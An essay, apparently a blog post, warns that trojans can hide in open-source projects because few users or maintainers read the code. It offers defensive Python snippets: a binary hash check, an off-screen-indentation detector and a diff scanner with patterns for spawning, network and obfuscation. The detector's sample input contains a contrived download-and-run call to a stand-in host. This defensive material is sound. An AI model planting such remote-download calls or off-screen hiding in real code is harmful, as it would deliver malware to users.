For a long time we’ve assumed that if the software we use is open source, we’re safe from malware: hiding it there was too difficult, and the reward too small compared with traditional ways of distributing malware. But as open source software gains popularity, and more and more single-handed projects pop up, this may no longer be true. Today it would be entirely feasible for an open source trojan to exist, disguising malware inside a seemingly innocent application that’s useful enough to be attractive. Why has this become so much easier? Because users and developers alike don’t pay enough attention to the code they’re running.
Why do we assume that open source software is safe?
Let’s start with why we naturally assume that open source software is safe and free from malware:
- The code is written by a team of independent developers. If one developer tries to slip malware into a project, it’ll be caught by the other developers.
- The code is publicly available, meaning that if there were malware hidden within it, someone would find it.
- If malware is hidden in some open source code and someone does find it, the code can be traced back to the developer who wrote and distributed it. Most developers don’t want to take that risk.
- The code is reviewed by the package maintainers of popular Linux distributions before they compile it to produce packages for their users. If there is any malware hidden in the code, they should find it.
Unfortunately, all of these rely on one assumption: that people actually read the code. There are a number of other reasons why these points don’t necessarily hold, too, so let’s look at them in turn and see how an open source trojan could actually exist.
A team doesn’t mean that there won’t be any malware
Just because there’s a team of developers doesn’t mean that there won’t be any malware. The most obvious reason is that the whole team could be working towards the goal of producing a trojaned application. How can you prove that the supposedly “independent” developers really are independent? (Even a team of 50 or 100 developers could be co-ordinated by a malware-producing organisation.)
A second, and probably more likely, scenario is that one or two developers in a large team try to slip malware in. For this to work, the project has to be big, with a lot of developers, a lot of commits, and a lot of changes to the code in each commit. In projects like that, it’s quite possible that the maintainers won’t read through every single commit in its entirety before accepting it. All that’s needed is for someone to commit “fixes bug #1234” along with the code to fix the bug; the maintainer will compile the code, check that the bug is fixed, and accept the changes. What they won’t notice is that, hidden in the 200-or-so lines of refactoring needed to fix the bug, are 20-or-so lines that download a remote payload and execute it.
Finally, there are a lot of projects these days with only one or two developers working on them. This has become exceptionally common in recent years. In such cases, it is obviously easy to get malware into the code, since there is no maintainer to sneak the code past.
So let’s suppose that, by one method or another, an open source project now contains malware. But surely someone will find it, right? Wrong.
Publicly-available code isn’t guaranteed to be free of malware
Again, just because other people can see the code doesn’t mean there won’t be any malware. Think about it: have you actually read the code of any open source software that you use? I’ve read a few lines of some of the smaller projects here and there, but the big ones we take for granted. Firefox is so complicated, targeting many different platforms and operating systems, that nobody in their right mind is going to read the whole thing. I hacked on LibreOffice a bit at one time, but I read only the bits I needed to understand how the particular part that I was hacking on worked – the rest didn’t matter, and was again too complicated for me to spend my time on.
What if you’re downloading the code and compiling it yourself? You might have even chosen to compile it yourself rather than getting a pre-compiled binary that you don’t trust (since, after all, you can’t guarantee that a pre-compiled binary doesn’t include malware that isn’t in the publicly-available source code). You probably say to yourself “I’m sure this is safe, I can read through all the code myself if I wanted to, nobody would want to hide malware in something I can read like that!” but again, you don’t actually read the code before you compile it. Neither did anyone else who’s compiled the same code before. So it doesn’t matter whether you get something in source or binary form, you still don’t know what’s actually hidden inside.
Theoretically, if there was malware hidden in the code, someone could eventually stumble across it. But if it’s small in comparison to the rest of the codebase (again, think of large projects here where no one single person actually knows everything that’s going on in there) and it’s hidden in a code file that people are unlikely to need to read or hack on (say, a collection of core utility functions that are written once, tested, and then mostly forgotten about) then the chances of it being found are incredibly small.
So don’t assume, just because anyone can look at the code and find malware, that anyone actually has looked at the code, or that the people who have looked at the code actually found the malware.
Open source code can be untraceable
Moving on to the third point from the list at the start of this article, you’d think this would be enough to turn off any potential malware developers. Except that open source code can be untraceable. Malware developers and other people involved in criminal activities use fake identities all the time; it would be no big deal to use one when releasing open source software. In fact, compared with opening a bank account, getting a job, or starting a business, contributing to open source software under a fake identity is hilariously easy: no verification is performed, and no cross-checking is done on your claimed identity when you commit a code change. Some open source projects even prefer their developers to contribute anonymously or under fake identities (think of encryption, anonymisation, and reverse-engineering tools here, and other things which governments might be interested in putting a halt to).
Package maintainers should catch anything that’s been missed elsewhere
You might think that, if you use a Linux distribution, the package maintainers who package up the software that you download and install should offer another line of defense against malware. But you’re probably wrong again.
Just like when you compile code yourself, package maintainers for Linux distributions don’t read through all the code. They get a copy of the code, compile it, and test it. If it works, they release it. If it doesn’t work, they fiddle around with it and try to get it to work. They produce a patch from the changes they had to make to get it to work, and they keep applying the same patch to subsequent versions of the code until it’s either no longer needed or it doesn’t work anymore. Then they start again from scratch and fiddle around with it some more. But they don’t read the code, and they certainly don’t spend hours scrutinising it for malware. (If you submit the first version of something to a package repository, there will probably be more scrutinising of your code, but that’s where it ends.)
Besides, this only applies to Linux users (and those with package repositories at that). What about Windows users who install pre-compiled binaries directly from the developers?
Pre-compiled binaries may not match the source code you’re given
This one’s obvious so I won’t spend too long on it, but pre-compiled binaries that you download from the developer’s website can easily include malware that isn’t in the source code. What’s to say that the binary you’re downloading actually came from the code that you’re looking at?
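If the build is reproducible (same compiler, same flags, no embedded timestamps), you can check this yourself by compiling the published source and hashing both binaries. Here’s a rough sketch; the file paths are hypothetical, and note that most builds are not reproducible out of the box, so differing hashes alone don’t prove anything malicious:

```python
import hashlib

def sha256sum(path, chunk=8192):
    """Compute the SHA-256 digest of a file without loading it all into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while block := f.read(chunk):
            h.update(block)
    return h.hexdigest()

# Hypothetical paths: compare a binary you compiled yourself from the
# published source against the developer's pre-compiled download.
# Only meaningful if the build is reproducible (same compiler, flags,
# and no embedded timestamps); otherwise the hashes will differ even
# for honest binaries.
# if sha256sum("my-build/app") != sha256sum("downloaded/app"):
#     print("binaries differ -- investigate before running the download")
```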
Some third-party repositories, such as Ubuntu PPAs and F-Droid for open source Android apps, compile the code themselves and provide signed copies of the source code which, if you trust the repository, are guaranteed to be the source from which the binaries were compiled. Some, particularly PPAs, do allow shared libraries to be included in binary form, which can of course contain malware (although anyone who looks at the corresponding source code would be suspicious if part of it was distributed binary-only – again assuming that anyone actually looks at the code).
Why wasn’t this an issue before?
There was a time when open source software was a niche: the developers were community-minded and technically-orientated, and the users were geeks themselves. Most open source projects, even the ones that were incredibly popular among regular users of open source software, were dwarfed by closed source software and even freeware (which has always been a major way of distributing trojans, the focus of this discussion). Combined with the size and mindset of their userbases, the payout was too small compared with the amount of work required, and the risk taken, to distribute malware via open source projects. It was more viable to release freeware containing malware.
But this is no longer the case. Open source software is gaining mainstream popularity, and the very philosophies that built the open source community – trust and sharing – are making it look very attractive to malware developers. When the users trust the developers, and the developers trust each other, it becomes very easy to slip something malicious under everyone’s radar. And since open source software has a wider userbase now, and is even overtaking freeware in popularity, the payout now makes the effort required to use open source software as a malware distribution medium look worthwhile.
What can we do to protect ourselves?
Unfortunately, the only real way to protect yourself (whether you’re a user or a project maintainer) from these risks is to read the code. The whole safety and security benefit of open source software comes from the ability for anyone to review the source code, so to make use of that benefit you have to actually read the code. This applies especially to project maintainers, who can carefully review each change to the code as it comes in, while it’s broken down into manageable chunks. Does a commit alter any files that it shouldn’t need to? Does a commit seem particularly long for what it claims to do, as if it’s trying to hide something or discourage you from reading through it? Remember these are social engineering attacks, not technical ones. Watch out for even the age-old trick of indenting a line of code off the end of the screen. Be especially sure to scrutinise commits from new developers, who haven’t contributed to a project before or have only contributed a few times.
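That indentation trick, at least, is easy to catch mechanically. As a rough sketch (the 120-column threshold and the helper name are my own assumptions, not an existing tool), a check might flag any line whose leading whitespace pushes the code itself past a typical screen width:

```python
def flag_hidden_code(source, max_col=120):
    """Return (line_number, code) pairs for lines whose leading whitespace
    pushes the first non-space character past max_col -- the classic way
    to hide a statement off the right-hand edge of the screen."""
    flagged = []
    for n, line in enumerate(source.splitlines(), start=1):
        stripped = line.lstrip()
        if stripped and len(line) - len(stripped) > max_col:
            flagged.append((n, stripped))
    return flagged

# A contrived example: a payload-download call indented far off screen.
suspicious = "x = 1\n" + " " * 200 + "download_and_run('http://evil.example')\n"
print(flag_hidden_code(suspicious))  # flags line 2
```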
There are a few shortcuts that you can use to defend yourself, either as a project maintainer or as a user compiling an application from source, but unfortunately this becomes a cat-and-mouse game with malware developers, just like commercial antivirus products. Some of these could even be implemented as automated checks in a VCS.
- Does the code contain any fork() calls (or their equivalents in whatever libraries or platforms you’re using)?
- Does the code call any functions to read or modify files (e.g. open() and so on, or their equivalents in whatever libraries or platforms you’re using)?
- Does the code perform any network activity? This could be in the form of an HTTP request through a library, or a call to the system’s socket API.
- Is any of the code obfuscated? Look for short variable names and alternative encodings, e.g. base 64 or URL encoding.
- Are there any binary blobs or “libraries”?
Of course, there are situations where most of these would be legitimate, but they could serve as a set of automated checks in a VCS or CI system, prompting further manual investigation whenever one of them flags a commit.
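As a minimal sketch of such a check, the following flags added lines in a unified diff that match patterns like those above. The pattern list is illustrative only, not a real tool; it would need tuning per language and project, precisely because all of these calls are often legitimate:

```python
import re

# Illustrative patterns drawn from the checklist above; a real tool
# would tune these per language and project.
SUSPICIOUS = {
    "process spawn": re.compile(r"\b(fork|exec[lv]p?e?|system|popen)\s*\("),
    "file access":   re.compile(r"\b(open|fopen|unlink|chmod)\s*\("),
    "network":       re.compile(r"\b(socket|connect|urlopen)\s*\("),
    "obfuscation":   re.compile(r"\b(base64|b64decode|fromhex)\b"),
}

def scan_diff(diff_text):
    """Flag added lines (those starting with '+') in a unified diff that
    match any suspicious pattern. Returns (category, line) pairs for a
    human reviewer to look at -- this flags, it doesn't judge."""
    hits = []
    for line in diff_text.splitlines():
        if not line.startswith("+") or line.startswith("+++"):
            continue  # only newly added code is interesting
        body = line[1:]
        for category, pattern in SUSPICIOUS.items():
            if pattern.search(body):
                hits.append((category, body.strip()))
    return hits

diff = """+import base64
+data = urlopen(url).read()
+print('fixed bug #1234')"""
print(scan_diff(diff))  # flags the base64 import and the network call
```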
Unfortunately, trust doesn’t work here. Even if a project, its maintainers, and its regular developers are all trustworthy, it’s still possible for a malicious developer to slip something past them. The nature of open source development is that no project can be truly trusted unless you trust every single developer that’s ever contributed to it, or you trust the maintainers to have fully double-checked everything that’s been contributed (which, unfortunately, isn’t always the case, as I’ve explained).
We usually assume that open source software is safe because everyone has access to the source code, but this relies on the very big assumption that anyone reads the source code. In big projects, this is simply impractical. Maintainers have commits pouring in every day and don’t have time to review every single change, and most can’t keep track of the entire codebase of a project at any one time. Similarly, users who tout the fact that anyone can look at the source code simply wouldn’t be able to understand it all if they were to actually sit down and read it. Smaller projects are easier to get malware into, but again most people don’t read the source code, even if they compile it from source (which is often required with smaller projects that aren’t included in package repositories).
The only real defense against malware hidden in open source code is, ultimately, to read the code, or to make sure that someone else has read it and that you trust them to have read it properly. However, there are some automated tests that could be applied to flag code that is more likely to be malicious. I imagine that in five years’ time we could see such tests being applied regularly in version control or CI systems, by repository package maintainers, and possibly even by end users who compile software from source, if people become aware of the risk.
But that isn’t to say that open source software doesn’t have many advantages. It’s still preferable to proprietary software in many ways. It can still be more secure, and that security can still be verified by auditors. It’s still a lot harder to spy on users through open source software. It’s still a lot more resilient to vendor lock-in, and the developers are still more likely to listen to the users (and if they don’t, the users are still able to fork the project and continue their own version, if they can pull enough of their own developers together).
I don’t want to discourage anyone from using or developing open source software, or make people feel scared to use it. I just want to highlight an important risk, and encourage people to avoid the assumption that open source software is inherently safe, because the truth is that in many cases the users have as much idea what’s going on inside open source software as they do with closed source software. And I especially want to encourage developers to, at the very least, implement automated checks on incoming code changes to flag them for further review. As a community of like-minded developers, we can tackle this together.